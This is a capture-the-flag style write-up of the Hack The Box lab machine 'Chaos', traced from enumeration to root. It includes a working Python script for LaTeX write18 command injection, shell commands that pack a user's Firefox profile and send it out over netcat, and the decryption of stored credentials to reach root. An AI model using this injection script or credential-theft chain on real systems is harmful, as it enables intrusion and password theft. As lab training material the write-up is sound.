Ech0 - 02 / 04 / 2020

Chaos Writeup

Introduction :



Chaos is a Medium linux box released back in December 2018.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


  ┌[ ech0 @ Mahakala ]-[ 2020-04-01 ]-[ 10.10.14.42/23 ]-[~]
  └→ sudo nmap -vvv -sTU -p- 10.10.10.120 --max-retries 0 -Pn --min-rate=1000 | grep Discovered
  [sudo] password for ech0:
  Discovered open port 10000/udp on 10.10.10.120
  Discovered open port 993/tcp on 10.10.10.120
  Discovered open port 110/tcp on 10.10.10.120
  Discovered open port 80/tcp on 10.10.10.120
  Discovered open port 995/tcp on 10.10.10.120
  Discovered open port 143/tcp on 10.10.10.120
  Discovered open port 10000/tcp on 10.10.10.120

  ┌[ ech0 @ Mahakala ]-[ 2020-04-01 ]-[ 10.10.14.42/23 ]-[~]
  └→ sudo nmap -sCVU -p10000 10.10.10.120
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 17:33 BST
  Nmap scan report for 10.10.10.120
  Host is up (0.070s latency).

  PORT      STATE SERVICE VERSION
  10000/udp open  webmin  (https on TCP port 10000)

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds

  ┌[ ech0 @ Mahakala ]-[ 2020-04-01 ]-[ 10.10.14.42/23 ]-[~]
  └→ nmap -sCVT -p993,110,80,995,143,10000 10.10.10.120
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 17:33 BST
  Nmap scan report for 10.10.10.120
  Host is up (0.046s latency).

  PORT      STATE SERVICE  VERSION
  80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
  |_http-server-header: Apache/2.4.34 (Ubuntu)
  |_http-title: Site doesn't have a title (text/html).
  110/tcp   open  pop3     Dovecot pop3d
  |_pop3-capabilities: SASL AUTH-RESP-CODE UIDL STLS PIPELINING TOP CAPA RESP-CODES
  | ssl-cert: Subject: commonName=chaos
  | Subject Alternative Name: DNS:chaos
  | Not valid before: 2018-10-28T10:01:49
  |_Not valid after:  2028-10-25T10:01:49
  |_ssl-date: TLS randomness does not represent time
  143/tcp   open  imap     Dovecot imapd (Ubuntu)
  |_imap-capabilities: SASL-IR more STARTTLS LOGINDISABLEDA0001 post-login Pre-login listed LOGIN-REFERRALS IDLE ID have capabilities ENABLE IMAP4rev1 OK LITERAL+
  | ssl-cert: Subject: commonName=chaos
  | Subject Alternative Name: DNS:chaos
  | Not valid before: 2018-10-28T10:01:49
  |_Not valid after:  2028-10-25T10:01:49
  |_ssl-date: TLS randomness does not represent time
  993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
  |_imap-capabilities: SASL-IR more Pre-login post-login OK listed LOGIN-REFERRALS IDLE AUTH=PLAINA0001 have capabilities ENABLE IMAP4rev1 ID LITERAL+
  | ssl-cert: Subject: commonName=chaos
  | Subject Alternative Name: DNS:chaos
  | Not valid before: 2018-10-28T10:01:49
  |_Not valid after:  2028-10-25T10:01:49
  |_ssl-date: TLS randomness does not represent time
  995/tcp   open  ssl/pop3 Dovecot pop3d
  |_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE UIDL USER PIPELINING TOP CAPA RESP-CODES
  | ssl-cert: Subject: commonName=chaos
  | Subject Alternative Name: DNS:chaos
  | Not valid before: 2018-10-28T10:01:49
  |_Not valid after:  2028-10-25T10:01:49
  |_ssl-date: TLS randomness does not represent time
  10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
  |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 45.60 seconds

Part 2 : Getting User Access



Our nmap scan picked up port 80 so let's add the chaos.htb hostname to our /etc/hosts file and browse to it:

sadly this is just a generic webpage with nothing really interesting on it. So instead we check out the port 10000 which reveals us the webmin service:

this webpage doesn't hint us towards any CVE nor can we guess the credentials, so we gobust the website instead:


  ┌[ ech0 @ Mahakala ]-[ 2020-04-01 ]-[ 10.10.14.42/23 ]-[~]
  └→ gobuster dir -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -s 200,204,301,302 -u http://10.10.10.120
  /wp (Status: 301)
  /javascript (Status: 301)

Even though browsing to 10.10.10.120 gives us the "no direct IP allowed" there was still a wordpress website for us to find! so checking it out :

As expected we have a wordpress website. It only has a password protected post in there, so we scan the website using wpscan:


  ┌[ ech0 @ Mahakala ]-[ 2020-04-01 ]-[ 10.10.14.42/23 ]-[~]
  └→ wpscan --url http://10.10.10.120/wp/wordpress
  _______________________________________________________________
           __          _______   _____
           \ \        / /  __ \ / ____|
            \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
             \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
              \  /\  /  | |     ____) | (__| (_| | | | |
               \/  \/   |_|    |_____/ \___|\__,_|_| |_|

           WordPress Security Scanner by the WPScan Team
                           Version 3.7.9
         Sponsored by Automattic - https://automattic.com/
         @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  _______________________________________________________________

[...]

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.34 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.120/wp/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.120/wp/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://10.10.10.120/wp/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.120/wp/wordpress/index.php/feed/, https://wordpress.org/?v=4.9.8
 |  - http://10.10.10.120/wp/wordpress/index.php/comments/feed/, https://wordpress.org/?v=4.9.8

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.10.120/wp/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | Readme: http://10.10.10.120/wp/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://10.10.10.120/wp/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.9.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.10.120/wp/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.9.8, Match: 'Version: 1.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Apr  1 18:08:43 2020
[+] Requests Done: 51
[+] Cached Requests: 5
[+] Data Sent: 12.352 KB
[+] Data Received: 290.885 KB
[+] Memory used: 199.727 MB
[+] Elapsed time: 00:00:08

Not much interesting results here, the trick here was that we had to find the username human and use it as a password:


  username – ayush
  password – jiujitsu

Once decrypted, we have credentials to use on the email service which was referenced in a note we found earlier so we will go to the subdomain webmail.chaos.htb and use those credentials there after we added it to our hosts file:

Once logged in as ayush we have access to his webmail and to a particular draft message that contains the username "sahay" with an encrypted textfile and the python script used to decrypt it:


  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ mv ~/Downloads/en.py . && mv ~/Downloads/enim_msg.txt .

  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ ls
  enim_msg.txt  en.py

The python script is an AES CBC encrypting script:


  def encrypt(key, filename):
      chunksize = 64*1024
      outputFile = "en" + filename
      filesize = str(os.path.getsize(filename)).zfill(16)
      IV =Random.new().read(16)

      encryptor = AES.new(key, AES.MODE_CBC, IV)

      with open(filename, 'rb') as infile:
          with open(outputFile, 'wb') as outfile:
              outfile.write(filesize.encode('utf-8'))
              outfile.write(IV)

              while True:
                  chunk = infile.read(chunksize)

                  if len(chunk) == 0:
                      break
                  elif len(chunk) % 16 != 0:
                      chunk += b' ' * (16 - (len(chunk) % 16))

                  outfile.write(encryptor.encrypt(chunk))

  def getKey(password):
              hasher = SHA256.new(password.encode('utf-8'))
              return hasher.digest()

From there we write our own python script to decrypt the enim_msg.txt file, we'll use Snowscan's python script which uses the Crypto library:


  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ pip install Crypto
  Collecting Crypto
    Downloading https://files.pythonhosted.org/packages/fc/bb/0b812dc02e6357606228edfbf5808f5ca0a675a84273578c3a199e841cd8/crypto-1.4.1-py2.py3-none-any.whl
  Collecting Naked (from Crypto)
    Downloading https://files.pythonhosted.org/packages/02/36/b8107b51adca73402ec1860d88f41d958e275e60eea6eeaa9c39ddb89a40/Naked-0.1.31-py2.py3-none-any.whl (590kB)
      100% |████████████████████████████████| 593kB 831kB/s
  Collecting shellescape (from Crypto)
    Downloading https://files.pythonhosted.org/packages/d0/f4/0081137fceff5779cd4205c1e96657e41cc2d2d56c940dc8eeb6111780f7/shellescape-3.8.1-py2.py3-none-any.whl
  Collecting pyyaml (from Naked->Crypto)
    Downloading https://files.pythonhosted.org/packages/64/c2/b80047c7ac2478f9501676c988a5411ed5572f35d1beff9cae07d321512c/PyYAML-5.3.1.tar.gz (269kB)
      100% |████████████████████████████████| 276kB 1.3MB/s
  Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from Naked->Crypto) (2.22.0)
  Building wheels for collected packages: pyyaml
    Running setup.py bdist_wheel for pyyaml ... done
    Stored in directory: /home/ech0/.cache/pip/wheels/a7/c1/ea/cf5bd31012e735dc1dfea3131a2d5eae7978b251083d6247bd
  Successfully built pyyaml
  Installing collected packages: pyyaml, Naked, shellescape, Crypto
  Successfully installed Crypto-1.4.1 Naked-0.1.31 pyyaml-5.3.1 shellescape-3.8.1

  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ nano decrypt.py

  from Crypto import Random
  from Crypto.Cipher import AES
  from Crypto.Hash import SHA256

  def getKey(password):
          hasher=SHA256.new(password)
          return hasher.digest()

  with open('enim_msg.txt') as f:
          c = f.read()

  filesize = int(c[:16])
  print("filesize: %d" % filesize)
  iv = c[16:32]
  print("IV: %s" % iv)
  key = getKey("sahay")
  cipher = AES.new(key,AES.MODE_CBC,iv)
  print(cipher.decrypt(c[32:]))

And with the decrypted message we are now hinted towards a hidden directory :


  http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Going there we see a PDF making webpage using an ajax php script to generate said pdf files.

So let's use burpsuite to intercept the request in order to send it to the repeater (CTRL+R) and go there (CTRL+SHIFT+R)

Once there we send the request and see that the webpage is using LaTeX to generate our pdf files. Therefore we can try to do some arbitrary commands using LaTeX:

Although as you can see a few commands are blacklisted:

The trick here was, that we could use the following command :


  \immediate\write18{id}

As you can see we have been able to execute the "id" command, which gave us a hint that we could get cmd execution as www-data. For this next part we'll use Snowscan's python script that sends the request, but also uses regular expressions to remove the excessive amount of data:


  import re
  import requests

  headers = {
          'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
          'X-Requested-With': 'XMLHttpRequest',
          'Cookie': 'redirect=1'
  }

  while(True):
          cmd=raw_input('> ')

          data = {
                  'content': '\\immediate\\write18{%s}' % cmd,
                  'template': 'test1'
          }

          r = requests.post('http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/ajax.php', headers=headers,data=data)
          out = r.text
          m = re.search('.*\(/usr/share/texlive/texmf-dist/tex/latex/amsfonts/umsa.fd\)\n\(/usr/share/texlive/texmf-dist/tex/latex/amsfonts/umsb.fd\)(.*)\[1',out, re.MULTILINE|re.DOTALL)
          if m:
                  print(m.group(1))

  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ python snowscan_is_awesome.py
  > id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)

  > ls -lash /home
  total 16K
  4.0K drwxr-xr-x  4 root  root  4.0K Oct 28  2018 .
  4.0K drwxr-xr-x 22 root  root  4.0K Dec  9  2018 ..
  4.0K drwx------  5 ayush ayush 4.0K Nov 24  2018 ayush
  4.0K drwx------  5 sahay sahay 4.0K Nov 24  2018 sahay

  > which nc
  /bin/nc

As expected we have 2 users on the box, ayush and sahay. And we have netcat there so we can try to use it to get a reverse shell onto the box but unfortunately that doesnt work so we could upload our own netcat binary there in /tmp and use it to get ourselves a reverse shell like snowscan did, but since python is there on the machine we'll just use a python one liner instead:

And we are logged in as www-data ! lets privesc to the user ayush since we know his password "jiujitsu"


  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ nc -lvnp 9001
  Listening on 0.0.0.0 9001
  Connection received on 10.10.10.120 36402
  /bin/sh: 0: can't access tty; job control turned off
  $ id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  $ su -l ayush
  su: must be run from a terminal
  $ python -c 'import pty;pty.spawn("/bin/bash")'
  www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ cd /
  cd /
  www-data@chaos:/$ su -l ayush
  su -l ayush
  Password: jiujitsu

  ayush@chaos:~$ cat user.txt
  cat user.txt
  Command 'cat' is available in '/bin/cat'
  The command could not be located because '/bin' is not included in the PATH environment variable.
  cat: command not found

2 things here, first we had to spawn a TTY shell using python's pty module, then we have been able to privesc to the user ayush, however from here we cannot use "cat" because the PATH environment variable hasn't been properly set, so we fix it ourselves:


  ayush@chaos:~$ cat user.txt
  cat user.txt
  Command 'cat' is available in '/bin/cat'
  The command could not be located because '/bin' is not included in the PATH environment variable.
  cat: command not found

  ayush@chaos:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  ayush@chaos:~$ cat user.txt
  cat user.txt
  eeXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! we have been able to print out the user flag.

Part 3 : Getting Root Access



Now in order to privesc on this box we can use the Firefox credentials path, which consists in remembering that we had a webmin application running, and that by default the root user credentials are used to log in to the application. In ayush's home directory there is a .mozilla folder that contains encrypted firefox credentials in logins.json:


  ayush@chaos:~$ ls -lash
  ls -lash
  total 40K
  4.0K drwx------ 6 ayush ayush 4.0K Apr  2 12:13 .
  4.0K drwxr-xr-x 4 root  root  4.0K Oct 28  2018 ..
  4.0K drwxr-xr-x 2 root  root  4.0K Oct 28  2018 .app
     0 -rw------- 1 root  root     0 Nov 24  2018 .bash_history
  4.0K -rw-r--r-- 1 ayush ayush  220 Oct 28  2018 .bash_logout
  4.0K -rwxr-xr-x 1 root  root    22 Oct 28  2018 .bashrc
  4.0K drwx------ 3 ayush ayush 4.0K Apr  2 12:13 .gnupg
  4.0K drwx------ 3 ayush ayush 4.0K Apr  2 11:34 mail
  4.0K drwx------ 4 ayush ayush 4.0K Sep 29  2018 .mozilla
  4.0K -rw-r--r-- 1 ayush ayush  807 Oct 28  2018 .profile
  4.0K -rw------- 1 ayush ayush   33 Oct 28  2018 user.txt
  ayush@chaos:~$ cd .mozilla
  cd .mozilla
  ayush@chaos:~/.mozilla$ ls -lash
  ls -lash
  total 16K
  4.0K drwx------ 4 ayush ayush 4.0K Sep 29  2018 .
  4.0K drwx------ 6 ayush ayush 4.0K Apr  2 12:13 ..
  4.0K drwx------ 2 ayush ayush 4.0K Sep 29  2018 extensions
  4.0K drwx------ 4 ayush ayush 4.0K Sep 29  2018 firefox
  ayush@chaos:~/.mozilla$ cd firefox
  cd firefox
  ayush@chaos:~/.mozilla/firefox$ ls -lash
  ls -lash
  total 20K
  4.0K drwx------  4 ayush ayush 4.0K Sep 29  2018  .
  4.0K drwx------  4 ayush ayush 4.0K Sep 29  2018  ..
  4.0K drwx------ 10 ayush ayush 4.0K Oct 27  2018  bzo7sjt1.default
  4.0K drwx------  4 ayush ayush 4.0K Oct 15  2018 'Crash Reports'
  4.0K -rw-r--r--  1 ayush ayush  104 Sep 29  2018  profiles.ini
  ayush@chaos:~/.mozilla/firefox$ cd bzo7sjt1.default
  cd bzo7sjt1.default
  ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ ls -lash
  ls -lash
  total 15M
  4.0K drwx------ 10 ayush ayush 4.0K Oct 27  2018 .
  4.0K drwx------  4 ayush ayush 4.0K Sep 29  2018 ..
  4.0K -rw-------  1 ayush ayush   24 Oct 27  2018 addons.json
  4.0K -rw-r--r--  1 ayush ayush  222 Oct 27  2018 AlternateServices.txt
  560K -rw-------  1 ayush ayush 559K Oct 11  2018 blocklist-addons.json
   28K -rw-------  1 ayush ayush  28K Oct  7  2018 blocklist-gfx.json
  136K -rw-------  1 ayush ayush 136K Oct  7  2018 blocklist-plugins.json
  420K -rw-------  1 ayush ayush 420K Oct 25  2018 blocklist.xml
  4.0K drwx------  2 ayush ayush 4.0K Oct 27  2018 bookmarkbackups
   92K -rw-------  1 ayush ayush  92K Oct 27  2018 cert9.db
  4.0K -rw-------  1 ayush ayush  362 Oct 27  2018 cert_override.txt
  4.0K -rw-------  1 ayush ayush  170 Sep 29  2018 compatibility.ini
  4.0K -rw-------  1 ayush ayush  809 Sep 29  2018 containers.json
  224K -rw-r--r--  1 ayush ayush 224K Oct 24  2018 content-prefs.sqlite
  512K -rw-r--r--  1 ayush ayush 512K Oct 27  2018 cookies.sqlite
   32K -rw-r--r--  1 ayush ayush  32K Oct 27  2018 cookies.sqlite-shm
     0 -rw-r--r--  1 ayush ayush    0 Oct 27  2018 cookies.sqlite-wal
  4.0K drwx------  3 ayush ayush 4.0K Oct 27  2018 crashes
  4.0K drwx------  3 ayush ayush 4.0K Oct 27  2018 datareporting
  4.0K -rw-r--r--  1 ayush ayush  167 Sep 29  2018 extensions.ini
  8.0K -rw-------  1 ayush ayush 5.6K Oct 27  2018 extensions.json
  192K -rw-r--r--  1 ayush ayush 192K Oct 24  2018 formhistory.sqlite
  4.0K drwx------  3 ayush ayush 4.0K Sep 29  2018 gmp
   36K -rw-------  1 ayush ayush  36K Oct 27  2018 key4.db
  1.3M -rw-r--r--  1 ayush ayush 1.3M Oct 11  2018 kinto.sqlite
  4.0K -rw-------  1 ayush ayush  570 Oct 27  2018 logins.json
  4.0K -rw-r--r--  1 ayush ayush 3.7K Sep 29  2018 mimeTypes.rdf
  4.0K drwx------  2 ayush ayush 4.0K Oct 25  2018 minidumps
     0 -rw-r--r--  1 root  root     0 Oct 27  2018 .parentlock
   96K -rw-r--r--  1 ayush ayush  96K Sep 29  2018 permissions.sqlite
  4.0K -rw-------  1 ayush ayush  868 Sep 29  2018 pkcs11.txt
   10M -rw-r--r--  1 ayush ayush  10M Oct 27  2018 places.sqlite
   32K -rw-r--r--  1 ayush ayush  32K Oct 27  2018 places.sqlite-shm
   36K -rw-r--r--  1 ayush ayush  33K Oct 27  2018 places.sqlite-wal
  4.0K -rw-------  1 ayush ayush  469 Sep 29  2018 pluginreg.dat
   12K -rw-------  1 ayush ayush  12K Oct 27  2018 prefs.js
   44K -rw-r--r--  1 ayush ayush  43K Oct 11  2018 revocations.txt
  4.0K drwx------  2 ayush ayush 4.0K Oct 26  2018 saved-telemetry-pings
   20K -rw-------  1 ayush ayush  17K Sep 29  2018 search.json.mozlz4
     0 -rw-r--r--  1 ayush ayush    0 Oct 27  2018 SecurityPreloadState.txt
  4.0K -rw-------  1 ayush ayush   90 Oct 27  2018 sessionCheckpoints.json
  4.0K drwx------  2 ayush ayush 4.0K Oct 27  2018 sessionstore-backups
  8.0K -rw-r--r--  1 ayush ayush 5.3K Oct 27  2018 SiteSecurityServiceState.txt
  4.0K drwxr-xr-x  5 ayush ayush 4.0K Oct  9  2018 storage
  4.0K -rw-r--r--  1 ayush ayush  512 Sep 29  2018 storage.sqlite
  4.0K -rwx------  1 ayush ayush   29 Sep 29  2018 times.json
  256K -rw-r--r--  1 ayush ayush 256K Oct 27  2018 webappsstore.sqlite
   32K -rw-r--r--  1 ayush ayush  32K Oct 27  2018 webappsstore.sqlite-shm
     0 -rw-r--r--  1 ayush ayush    0 Oct 27  2018 webappsstore.sqlite-wal
  4.0K -rw-------  1 ayush ayush 1.1K Oct 27  2018 xulstore.json

So we print out his logins.json file :


  ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cat logins.json
  cat logins.json
  {"nextId":3,"logins":[{"id":2,"hostname":"https://chaos.htb:10000","httpRealm":null,"formSubmitURL":"https://chaos.htb:10000","usernameField":"user","passwordField":"pass","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDSAazrlUMZFBAhbsMDAlL9iaw==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNx7bW1TuuCuBBAP8YwnxCZH0+pLo6cJJxnb","guid":"{cb6cd202-0ff8-4de5-85df-e0b8a0f18778}","encType":1,"timeCreated":1540642202692,"timeLastUsed":1540642202692,"timePasswordChanged":1540642202692,"timesUsed":1}],"disabledHosts":[],"version":2}

Looking at logins.json we see that hte formSubmitURL is https://chaos.htb:10000 which is the webmin application we found earlier, So the idea here is, since tar is there on the box :


  ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ which tar
  which tar
  /bin/tar

We can tar-compress ayush's entire firefox profile directory, and send it to our machine using netcat:


  ayush@chaos:~/.mozilla/firefox$ tar -zcvf ayush.tar.gz bzo7sjt1.default
  tar -zcvf ayush.tar.gz bzo7sjt1.default
  bzo7sjt1.default/
  bzo7sjt1.default/cookies.sqlite
  bzo7sjt1.default/places.sqlite
  bzo7sjt1.default/webappsstore.sqlite
  bzo7sjt1.default/permissions.sqlite
  bzo7sjt1.default/sessionstore-backups/
  tar: bzo7sjt1.default/sessionstore-backups/recovery.js: Cannot open: Permission denied
  tar: bzo7sjt1.default/sessionstore-backups/upgrade.js-20180326230345: Cannot open: Permission denied
  tar: bzo7sjt1.default/sessionstore-backups/previous.js: Cannot open: Permission denied
  tar: bzo7sjt1.default/sessionstore-backups/recovery.bak: Cannot open: Permission denied
  bzo7sjt1.default/bookmarkbackups/
  tar: bzo7sjt1.default/bookmarkbackups/bookmarks-2018-09-29_23_KNEJR-waZJZwUVshUNhFqg==.jsonlz4: Cannot open: Permission denied
  tar: bzo7sjt1.default/bookmarkbackups/bookmarks-2018-10-27_24_0UTpOFh1V6tsL2fi6cyvng==.jsonlz4: Cannot open: Permission denied
  bzo7sjt1.default/cookies.sqlite-wal
  bzo7sjt1.default/formhistory.sqlite
  bzo7sjt1.default/webappsstore.sqlite-shm
  bzo7sjt1.default/storage.sqlite
  bzo7sjt1.default/cert_override.txt
  bzo7sjt1.default/gmp/
  tar: bzo7sjt1.default/gmp/Linux_x86_64-gcc3: Cannot open: Permission denied
  bzo7sjt1.default/blocklist.xml
  bzo7sjt1.default/cookies.sqlite-shm
  bzo7sjt1.default/search.json.mozlz4
  bzo7sjt1.default/AlternateServices.txt
  bzo7sjt1.default/content-prefs.sqlite
  bzo7sjt1.default/cert9.db
  bzo7sjt1.default/storage/
  bzo7sjt1.default/storage/temporary/
  bzo7sjt1.default/storage/default/
  bzo7sjt1.default/storage/default/https+++www.google.com/
  bzo7sjt1.default/storage/default/https+++www.google.com/.metadata-v2
  bzo7sjt1.default/storage/default/https+++www.google.com/idb/
  bzo7sjt1.default/storage/default/https+++www.google.com/idb/548905059db.sqlite
  bzo7sjt1.default/storage/default/https+++www.google.com/idb/548905059db.files/
  bzo7sjt1.default/storage/default/https+++www.google.com/.metadata
  bzo7sjt1.default/storage/permanent/
  bzo7sjt1.default/storage/permanent/chrome/
  bzo7sjt1.default/storage/permanent/chrome/.metadata-v2
  bzo7sjt1.default/storage/permanent/chrome/idb/
  bzo7sjt1.default/storage/permanent/chrome/idb/2918063365piupsah.sqlite
  bzo7sjt1.default/storage/permanent/chrome/idb/2918063365piupsah.files/
  bzo7sjt1.default/storage/permanent/chrome/.metadata
  bzo7sjt1.default/datareporting/
  tar: bzo7sjt1.default/datareporting/session-state.json: Cannot open: Permission denied
  tar: bzo7sjt1.default/datareporting/state.json: Cannot open: Permission denied
  tar: bzo7sjt1.default/datareporting/archived: Cannot open: Permission denied
  tar: bzo7sjt1.default/datareporting/aborted-session-ping: Cannot open: Permission denied
  bzo7sjt1.default/pkcs11.txt
  bzo7sjt1.default/logins.json
  bzo7sjt1.default/extensions.ini
  bzo7sjt1.default/compatibility.ini
  bzo7sjt1.default/minidumps/
  bzo7sjt1.default/blocklist-gfx.json
  bzo7sjt1.default/.parentlock
  bzo7sjt1.default/sessionCheckpoints.json
  bzo7sjt1.default/prefs.js
  bzo7sjt1.default/addons.json
  bzo7sjt1.default/xulstore.json
  bzo7sjt1.default/revocations.txt
  bzo7sjt1.default/extensions.json
  bzo7sjt1.default/places.sqlite-shm
  bzo7sjt1.default/key4.db
  bzo7sjt1.default/crashes/
  tar: bzo7sjt1.default/crashes/events: Cannot open: Permission denied
  tar: bzo7sjt1.default/crashes/store.json.mozlz4: Cannot open: Permission denied
  bzo7sjt1.default/pluginreg.dat
  bzo7sjt1.default/places.sqlite-wal
  bzo7sjt1.default/webappsstore.sqlite-wal
  bzo7sjt1.default/blocklist-plugins.json
  bzo7sjt1.default/kinto.sqlite
  bzo7sjt1.default/times.json
  bzo7sjt1.default/saved-telemetry-pings/
  tar: bzo7sjt1.default/saved-telemetry-pings/f153dbe5-b2e1-46ad-bb38-d0d2e22ab3fe: Cannot open: Permission denied
  tar: bzo7sjt1.default/saved-telemetry-pings/dc2f3e22-3710-4da9-9d30-c01f0885a480: Cannot open: Permission denied
  tar: bzo7sjt1.default/saved-telemetry-pings/b35e9f24-a4a9-4683-b4ec-1fdaf3533a7a: Cannot open: Permission denied
  bzo7sjt1.default/mimeTypes.rdf
  bzo7sjt1.default/containers.json
  bzo7sjt1.default/SecurityPreloadState.txt
  bzo7sjt1.default/SiteSecurityServiceState.txt
  bzo7sjt1.default/blocklist-addons.json
  tar: Exiting with failure status due to previous errors
  ayush@chaos:~/.mozilla/firefox$ ls
  ls
   ayush.tar.gz   bzo7sjt1.default  'Crash Reports'   profiles.ini

Transfer it using netcat and verify they are the same using md5sum:

From there we can use unode's firefox_decrypt python script to extract passwords from mozilla profiles:


  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ tar -xzvf ayush.tar.gz

  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ curl -sk https://raw.githubusercontent.com/unode/firefox_decrypt/master/firefox_decrypt.py > firefox_decrypt.py

  ┌[ ech0 @ Mahakala ]-[ 2020-04-02 ]-[ 10.10.14.42/23 ]-[~/_HTB/Chaos]
  └→ python firefox_decrypt.py bzo7sjt1.default
  2020-04-02 13:37:14,021 - WARNING - profile.ini not found in bzo7sjt1.default
  2020-04-02 13:37:14,022 - WARNING - Continuing and assuming 'bzo7sjt1.default' is a profile location

  Master Password for profile bzo7sjt1.default:

Use ayush's password 'jiujitsu':


  2020-04-02 13:37:14,021 - WARNING - profile.ini not found in bzo7sjt1.default
  2020-04-02 13:37:14,022 - WARNING - Continuing and assuming 'bzo7sjt1.default' is a profile location

  Master Password for profile bzo7sjt1.default:

  Website:   https://chaos.htb:10000
  Username: 'root'
  Password: 'Thiv8wrej~'

And there we have it ! we can finally privesc to root :


  ayush@chaos:~/.mozilla/firefox$ cd /
  cd /
  ayush@chaos:/$ su -l root
  su -l root
  Password: Thiv8wrej~

  root@chaos:~# cat root.txt
  cat root.txt
  4eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! We have been able to print out the root flag.

Conclusion



Here we can see the progress graph :

My Bunker

Some Address 67120,
Duttlenheim, France.

About Ech0

This cute theme was created to showcase your work in a simple way. Use it wisely.